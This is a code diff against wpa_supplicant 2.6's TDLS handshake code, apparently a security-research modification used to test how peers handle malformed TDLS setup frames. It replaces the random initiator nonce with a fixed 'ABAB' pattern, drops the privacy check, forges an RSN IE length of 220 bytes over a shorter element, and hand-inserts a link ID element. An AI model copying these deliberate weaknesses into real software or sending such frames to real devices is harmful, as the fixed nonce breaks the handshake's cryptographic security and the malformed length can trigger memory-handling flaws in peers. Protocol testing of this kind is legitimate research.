--- wpa_supplicant-2.6/src/rsn_supp/tdls.c 2016-10-02 19:51:11.000000000 +0100
|
+++ TDLSSetupModification/wpa_supplicant-2.6/src/rsn_supp/tdls.c 2016-12-19 13:15:54.000000000 +0000
|
@@ -1152,13 +1152,12 @@
|
ftie->ie_type = WLAN_EID_FAST_BSS_TRANSITION;
|
ftie->ie_len = sizeof(struct wpa_tdls_ftie) - 2;
|
|
- if (os_get_random(peer->inonce, WPA_NONCE_LEN)) {
|
- wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
|
- "TDLS: Failed to get random data for initiator Nonce");
|
- os_free(rbuf);
|
- wpa_tdls_peer_free(sm, peer);
|
- return -1;
|
- }
|
+ //PATCH
|
+ //Using a fabricated nonce! This should later get included in the FTIE
|
+ int i=0;
|
+ for (i=0; i<WPA_NONCE_LEN; i++)
|
+ ((u8*)peer->inonce)[i] = (i % 2 == 0) ? 'A' : 'B';
|
+
|
wpa_hexdump(MSG_DEBUG, "TDLS: Initiator Nonce for TPK handshake",
|
peer->inonce, WPA_NONCE_LEN);
|
os_memcpy(ftie->Snonce, peer->inonce, WPA_NONCE_LEN);
|
@@ -1325,59 +1324,37 @@
|
u32 lifetime;
|
int status;
|
u32 peer_capab = 0;
|
+ int rsnie_length = 220;
|
|
buf_len = 0;
|
- if (wpa_tdls_get_privacy(sm)) {
|
- /* Peer RSN IE, FTIE(Initiator Nonce, Responder Nonce),
|
- * Lifetime */
|
- buf_len += peer->rsnie_i_len + sizeof(struct wpa_tdls_ftie) +
|
- sizeof(struct wpa_tdls_timeoutie);
|
-#ifdef CONFIG_TDLS_TESTING
|
- if (tdls_testing & TDLS_TESTING_LONG_FRAME)
|
- buf_len += 170;
|
-#endif /* CONFIG_TDLS_TESTING */
|
- }
|
+ buf_len = rsnie_length + 2 + sizeof(struct wpa_tdls_ftie) + sizeof(struct wpa_tdls_timeoutie) + sizeof(struct wpa_tdls_lnkid);
|
|
rbuf = os_zalloc(buf_len + 1);
|
if (rbuf == NULL)
|
return -1;
|
pos = rbuf;
|
|
- if (!wpa_tdls_get_privacy(sm))
|
- goto skip_ies;
|
-
|
/* Peer RSN IE */
|
- pos = wpa_add_ie(pos, peer->rsnie_p, peer->rsnie_p_len);
|
-
|
+ wpa_add_ie(pos, peer->rsnie_p, peer->rsnie_p_len);
|
+ u8* rsn = pos;
|
+ pos[1] = rsnie_length;
|
+ pos += pos[1] + 2; //skipping the RSN IE
|
+ //Adding the FTIE
|
ftie = (struct wpa_tdls_ftie *) pos;
|
ftie->ie_type = WLAN_EID_FAST_BSS_TRANSITION;
|
/*TODO: ftie->mic_control to set 3-CONFIRM */
|
os_memcpy(ftie->Anonce, peer->rnonce, WPA_NONCE_LEN);
|
os_memcpy(ftie->Snonce, peer->inonce, WPA_NONCE_LEN);
|
ftie->ie_len = sizeof(struct wpa_tdls_ftie) - 2;
|
-
|
pos = (u8 *) (ftie + 1);
|
|
-#ifdef CONFIG_TDLS_TESTING
|
- if (tdls_testing & TDLS_TESTING_LONG_FRAME) {
|
- wpa_printf(MSG_DEBUG, "TDLS: Testing - add extra subelem to "
|
- "FTIE");
|
- ftie->ie_len += 170;
|
- *pos++ = 255; /* FTIE subelem */
|
- *pos++ = 168; /* FTIE subelem length */
|
- pos += 168;
|
- }
|
-#endif /* CONFIG_TDLS_TESTING */
|
+ //Manually adding a linkid IE
|
+ struct wpa_tdls_lnkid *l = (struct wpa_tdls_lnkid *) pos;
|
+ wpa_tdls_linkid(sm, (struct wpa_tdls_peer*)peer, l);
|
+ pos += sizeof(*l);
|
|
/* Lifetime */
|
lifetime = peer->lifetime;
|
-#ifdef CONFIG_TDLS_TESTING
|
- if (tdls_testing & TDLS_TESTING_WRONG_LIFETIME_CONF) {
|
- wpa_printf(MSG_DEBUG, "TDLS: Testing - use wrong TPK "
|
- "lifetime in confirm");
|
- lifetime++;
|
- }
|
-#endif /* CONFIG_TDLS_TESTING */
|
pos = wpa_add_tdls_timeoutie(pos, (u8 *) &timeoutie,
|
sizeof(timeoutie), lifetime);
|
wpa_printf(MSG_DEBUG, "TDLS: TPK lifetime %u seconds",
|
@@ -1386,14 +1363,6 @@
|
/* compute MIC before sending */
|
wpa_tdls_ftie_mic(peer->tpk.kck, 3, (u8 *) lnkid, peer->rsnie_p,
|
(u8 *) &timeoutie, (u8 *) ftie, ftie->mic);
|
-#ifdef CONFIG_TDLS_TESTING
|
- if (tdls_testing & TDLS_TESTING_WRONG_MIC) {
|
- wpa_printf(MSG_DEBUG, "TDLS: Testing - use wrong MIC");
|
- ftie->mic[0] ^= 0x01;
|
- }
|
-#endif /* CONFIG_TDLS_TESTING */
|
-
|
-skip_ies:
|
|
if (peer->vht_capabilities)
|
peer_capab |= TDLS_PEER_VHT;
|